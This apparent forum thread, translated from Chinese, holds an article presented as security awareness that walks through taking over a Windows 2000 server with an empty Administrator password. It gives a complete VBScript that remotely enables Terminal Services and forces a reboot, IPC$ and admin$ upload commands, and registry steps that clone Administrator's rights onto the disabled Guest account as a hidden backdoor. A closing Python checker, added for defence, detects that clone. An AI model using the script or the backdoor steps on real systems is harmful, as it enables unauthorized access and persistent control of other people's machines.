If IIS is installed, you can run iisreset /reboot to restart the computer.
From: KMWAP, Time: 2003-11-16 14:33:00, ID: 2297586
Please be more specific!
From: CXZ9, Time: 2003-11-16 14:51:00, ID: 2297613
Network security management
Unit: Nanjing Radio and TV University Author: Han rule
Abstract: This article tries to describe, from a hacker's point of view, the methods and the process used to take control of someone else's computer. The aim is to raise the vigilance of users of operating systems such as Windows 2000, to help them understand its security management mechanisms, and to put emphasis on strengthening network security management.
Keywords: footprinting, weak password, cloned account (backdoor)
Many users feel that Windows 2000 is good, which is why it has so many users. But some of those users do not really understand the security management mechanism of Windows 2000. This paper attempts a brief discussion of it from a hacker's perspective.
I. Footprinting
Footprinting is the reconnaissance of a target computer before an intrusion.
Suppose footprinting is finished and a scan has turned up a Windows 2000 Server (or higher) machine with a weak password. Assume the weak password is on the Administrator account, and that the password is empty.
There is no precise definition of a weak password; roughly, it is a password that can be guessed. For example, at least one Windows 2000 user name is always known, Administrator (the administrator account), and also Guest (disabled by default by the system). So an attacker only has to try passwords, and for various reasons most people either set no password at all or use simple numbers or dates as the password. There is now plenty of software that can crack such passwords in a short time, and cracking them requires neither advanced education nor skill.
II. Intrusion
Open a command prompt (CMD) on your own machine and run the following command:
cscript *.vbe 192.168.0.1 administrator "" 3389 /fr
Explanation: cscript *.vbe is the command (* stands for any name, because you write this VBScript yourself and may name it as you like; see the appendix). Next comes the IP address of the vulnerable computer, then the administrator account name, then the account password; since the administrator password of the server 192.168.0.1 is empty, a pair of double quotes is passed for it. Then comes the port (you can choose the Terminal Services port, but the default is 3389), and /fr is the restart switch (forced restart; /r is an ordinary restart, but the forced restart is recommended).
Terminal Services is only available on the Windows 2000 Server editions, not on Professional. The script detects the target's version; if it is Professional, you are prompted to abort the installation.
Then use ping to test (ping 192.168.0.1 -t) and see whether it has restarted. Once the restart is complete, you can move on to the next step.
III. Cloning an account (leaving a backdoor)
Open CMD on your own machine and establish an IPC$ connection from the command line:
net use \\192.168.0.1\ipc$ "" /user:"administrator"
Once the command succeeds, upload psu.exe to the C:\WinNT\System32 directory of the target machine:
copy psu.exe \\192.168.0.1\admin$\system32
When the upload has finished, start building the backdoor account.
Connect to the terminal with a Terminal Services client. Assume the Guest user is disabled; it is exactly the Guest account that we want to turn into the backdoor account.
Open CMD on the server and enter:
psu -p regedit -i PID
Here PID is the process ID of the system process winlogon. Right-click the taskbar, open Task Manager, go to the Processes tab and find the winlogon process; the number shown next to it is winlogon's PID. Suppose it is 1234; the command is then psu -p regedit -i 1234.
This opens the registry editor directly, and you can read the local SAM information.
Open the key
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
Under it is the local user information. What we want to do is give the disabled Guest account administrator privileges.
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
Look at the type of Administrator: it is 0x1F4. Then look at the type of Guest: it is 0x1F5. Knowing the types, open
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
Double-click the value F, copy all of its contents, then open
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
Double-click F and paste what you just copied into it.
After that, export the two keys
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
and
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
delete both keys after exporting, then import them again. Close the registry editor.
Open CMD and enter at the command line:
net user guest password (this command sets a password for Guest; the trailing "password" is the password)
Then enter:
net user guest /active:y
This command activates the Guest account, and the next one disables it again:
net user guest /active:n
(The above three lines must be run at the command prompt.)
Open Computer Management and look at the users: the Guest account still shows as disabled, but by now it has administrator privileges.
It does not appear in the Administrators group either, and it can log on to the terminal just like the Administrator account.
Appendix
On Error Resume Next
Set outstreem = WScript.StdOut
Set instreem = WScript.StdIn
' If started by double-click (wscript.exe), relaunch under cscript.exe so console I/O works
If LCase(Right(WScript.FullName, 11)) = "wscript.exe" Then
    Set objshell = WScript.CreateObject("WScript.Shell")
    objshell.Run "cmd.exe /k cscript //nologo " & Chr(34) & WScript.ScriptFullName & Chr(34)
    WScript.Quit
End If
If WScript.Arguments.Count < 3 Then
    Usage()
    WScript.Echo "Not enough parameters."
    WScript.Quit
End If
ipaddress = WScript.Arguments(0)
username = WScript.Arguments(1)
password = WScript.Arguments(2)
If WScript.Arguments.Count > 3 Then
    port = WScript.Arguments(3)
Else
    port = 3389
End If
If Not IsNumeric(port) Or port < 1 Or port > 65000 Then
    WScript.Echo "The port number is invalid."
    WScript.Quit
End If
If WScript.Arguments.Count > 4 Then
    reboot = WScript.Arguments(4)
Else
    reboot = ""
End If
Usage()
outstreem.Write "Connecting to " & ipaddress & "..."
Set objlocator = CreateObject("WbemScripting.SWbemLocator")
Set objswbemservices = objlocator.ConnectServer(ipaddress, "root\cimv2", username, password)
ShowError(Err.Number)
' 23 = wbemPrivilegeRemoteShutdown, 18 = wbemPrivilegeShutdown (needed for Win32Shutdown)
objswbemservices.Security_.Privileges.Add 23, True
objswbemservices.Security_.Privileges.Add 18, True
outstreem.Write "Checking OS type...."
Set colinstoscaption = objswbemservices.ExecQuery("Select Caption from Win32_OperatingSystem")
For Each objinstoscaption In colinstoscaption
    If InStr(objinstoscaption.Caption, "Server") > 0 Then
        WScript.Echo "OK!"
    Else
        WScript.Echo "OS type is " & objinstoscaption.Caption
        outstreem.Write "Do you want to cancel setup? [y/n]"
        strcancel = instreem.ReadLine
        If LCase(strcancel) <> "n" Then WScript.Quit
    End If
Next
outstreem.Write "Writing into registry...."
' StdRegProv in root\default is the WMI registry provider that exposes CreateKey/SetDWORDValue/SetStringValue
Set objinstreg = objlocator.ConnectServer(ipaddress, "root\default", username, password).Get("StdRegProv")
HKLM = &H80000002
HKU = &H80000003
With objinstreg
    .CreateKey HKLM, "Software\Microsoft\Windows\CurrentVersion\NetCache"
    .SetDWORDValue HKLM, "Software\Microsoft\Windows\CurrentVersion\NetCache", "Enabled", 0
    .CreateKey HKLM, "Software\Policies\Microsoft\Windows\Installer"
    .SetDWORDValue HKLM, "Software\Policies\Microsoft\Windows\Installer", "EnableAdminTSRemote", 1
    .SetDWORDValue HKLM, "System\CurrentControlSet\Control\Terminal Server", "TSEnabled", 1
    .SetDWORDValue HKLM, "System\CurrentControlSet\Services\TermDD", "Start", 2
    .SetDWORDValue HKLM, "System\CurrentControlSet\Services\TermService", "Start", 2
    .SetStringValue HKU, ".DEFAULT\Keyboard Layout\Toggle", "Hotkey", "1"
    .SetDWORDValue HKLM, "System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp", "PortNumber", CLng(port)
End With
ShowError(Err.Number)
rebt = LCase(reboot)
flag = 0
' Win32Shutdown flags: 2 = reboot, 6 = forced reboot
If rebt = "/r" Or rebt = "-r" Then flag = 2
If rebt = "/fr" Or rebt = "-fr" Then flag = 6
If flag <> 0 Then
    outstreem.Write "Now rebooting target...."
    strwqlquery = "Select * from Win32_OperatingSystem Where Primary = 'true'"
    Set colinstances = objswbemservices.ExecQuery(strwqlquery)
    For Each objinstance In colinstances
        objinstance.Win32Shutdown flag
    Next
    ShowError(Err.Number)
Else
    WScript.Echo "You need to reboot the target." & vbCrLf & "."
End If
WScript.Echo "You can log on to Terminal Services on port " & port & " later. Good luck!"

Function ShowError(errornumber)
    If errornumber <> 0 Then
        WScript.Echo "Error 0x" & CStr(Hex(Err.Number)) & "."
        If Err.Description <> "" Then
            WScript.Echo "Error description: " & Err.Description & "."
        End If
        WScript.Quit
    Else
        WScript.Echo "OK!"
    End If
End Function

Function Usage()
    WScript.Echo String(80, "-")
    WScript.Echo "This is the Windows 2000 Terminal Services script. Copyright: Hanzhi"
    WScript.Echo "Homepage: www.i94self.com; e-mail: i94self@hotmail.com"
    WScript.Echo "Usage:"
    WScript.Echo "cscript " & WScript.ScriptFullName & " TargetIP Username Password [Port] [/r | /fr]"
    WScript.Echo "Port: the default is 3389."
    WScript.Echo "/r: ordinary restart"
    WScript.Echo "/fr: forced restart"
    WScript.Echo String(80, "-") & vbCrLf
End Function
Notes: 1. This script is highly aggressive; do not use it for illegal purposes, otherwise the consequences are at your own risk.
2. Because the program contains commands that modify the registry, anti-virus software may treat it as a hacker tool and warn you.
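As an added example, which is not part of the original post or of Hanzhi's script, the following Python is an offline check for the clone described in section III above. Each key under SAM\SAM\Domains\Account\Users is named after the account's RID (000001F4 = 500 = Administrator, 000001F5 = 501 = Guest) and holds a binary value F. The checker assumes the commonly documented layout of F, with the RID stored as a little-endian DWORD at offset 0x30 and the ACB flags as a WORD at offset 0x38 (bit 0x0001 = disabled); those offsets are an assumption of this example. Pasting Administrator's F into the Guest key leaves RID 500 inside a key named for RID 501, and that mismatch is what the code looks for. The sample blobs are constructed for the example, not taken from a real hive.

```python
import struct
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Layout of the fixed part of a SAM user F value (commonly documented; an assumption here)
F_RID_OFFSET = 0x30    # account RID, little-endian DWORD
F_ACB_OFFSET = 0x38    # ACB flags, little-endian WORD
F_MIN_LEN = 0x50       # size of the fixed part of F
ACB_DISABLED = 0x0001  # "account disabled" bit in the ACB flags


@dataclass
class Finding:
    key_name: str      # key under ...\Users, e.g. "000001F5"
    key_rid: int       # RID implied by the key name
    embedded_rid: int  # RID stored inside F
    disabled: bool     # ACB "disabled" bit as stored in F
    reason: str


def parse_f(blob: bytes) -> Tuple[int, int]:
    """Return (rid, acb_flags) read out of a user F value."""
    if len(blob) < F_MIN_LEN:
        raise ValueError("F value too short: %d bytes" % len(blob))
    (rid,) = struct.unpack_from("<I", blob, F_RID_OFFSET)
    (acb,) = struct.unpack_from("<H", blob, F_ACB_OFFSET)
    return rid, acb


def find_cloned_accounts(users: Dict[str, bytes]) -> List[Finding]:
    """Flag every user key whose F carries a RID other than the one in its key name.

    `users` maps the hex key name under SAM\\SAM\\Domains\\Account\\Users to the
    raw F value. A pasted-in F keeps the donor's RID, so after the trick the
    Guest key 000001F5 carries RID 500: the key-name RID (501) and the RID
    inside F disagree, which does not happen on an untouched system.
    """
    by_rid: Dict[int, List[str]] = {}
    for key_name, blob in users.items():
        rid, _ = parse_f(blob)
        by_rid.setdefault(rid, []).append(key_name)

    findings: List[Finding] = []
    for key_name, blob in users.items():
        key_rid = int(key_name, 16)
        rid, acb = parse_f(blob)
        if rid == key_rid:
            continue
        reason = "F carries RID %d but the key name is RID %d" % (rid, key_rid)
        others = [k for k in by_rid[rid] if k != key_name]
        if others:
            reason += "; RID %d is also embedded in %s" % (rid, ", ".join(others))
        findings.append(Finding(key_name, key_rid, rid, bool(acb & ACB_DISABLED), reason))
    return findings


def make_f(rid: int, acb_flags: int) -> bytes:
    """Build a constructed F blob with only the fields this check reads filled in."""
    blob = bytearray(F_MIN_LEN)
    struct.pack_into("<I", blob, F_RID_OFFSET, rid)
    struct.pack_into("<H", blob, F_ACB_OFFSET, acb_flags)
    return bytes(blob)


# Constructed sample: the state the post leaves behind. Guest's F is a copy of
# Administrator's F, and "net user guest /active:n" has set the disabled bit.
SAMPLE_USERS = {
    "000001F4": make_f(0x1F4, 0x0010),  # Administrator: normal account, enabled
    "000001F5": make_f(0x1F4, 0x0011),  # Guest: cloned F (RID 500), disabled bit set
    "000003E8": make_f(0x3E8, 0x0010),  # an ordinary local user, untouched
}

if __name__ == "__main__":
    for f in find_cloned_accounts(SAMPLE_USERS):
        state = "disabled" if f.disabled else "enabled"
        print("%s (%s): %s" % (f.key_name, state, f.reason))
```

On a live system the Users keys are readable only as SYSTEM, which is why the post runs regedit inside winlogon's process; a defender can either export the SAM hive and read the F values with an offline registry parser, or open regedit as SYSTEM the same way, and then feed the key name to F mapping to find_cloned_accounts. Computer Management and net user only show the Guest account as disabled, so this comparison of the key name against the RID inside F is the check that actually exposes the backdoor.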